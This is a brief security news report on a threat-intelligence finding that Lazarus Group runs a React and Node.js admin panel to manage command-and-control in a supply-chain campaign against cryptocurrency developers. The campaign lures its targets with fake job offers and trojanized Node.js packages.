The notorious North Korean hacking collective, Lazarus Group, has implemented a sophisticated web-based administrative platform to manage their command-and-control (C2) operations. SecurityScorecard’s STRIKE team has uncovered this centralized system, which consists of a React application frontend and Node.js API backend.

This administrative framework serves as the backbone of Operation Phantom Circuit, a large-scale supply chain attack targeting the cryptocurrency sector and developers worldwide. The operation involves distributing trojanized versions of legitimate Node.js software packages containing hidden backdoors.

Key Findings:
– 1,639 total victims worldwide, with 233 targeted in January 2025
– Primary targets located in Brazil, France, and India (110 victims in India alone)
– Attack vector utilizes LinkedIn for social engineering, offering fake job opportunities
– Infrastructure employs Astrill VPN and Oculus Proxy endpoints for communication

The platform enables attackers to:
– Manage exfiltrated data
– Monitor compromised systems
– Control payload delivery
– Filter and search stolen information

Technical Details:
– Communication occurs over port 1224
– Uses React-based admin panels
– Implements Node.js APIs for backend operations
– Connects through multiple VPN layers to North Korean IP addresses

The campaign specifically targets developers by embedding malicious code into repositories, often disguised as coding tests or interview assignments. This sophisticated approach has allowed the Lazarus Group to infiltrate numerous organizations globally while maintaining centralized control over their operations.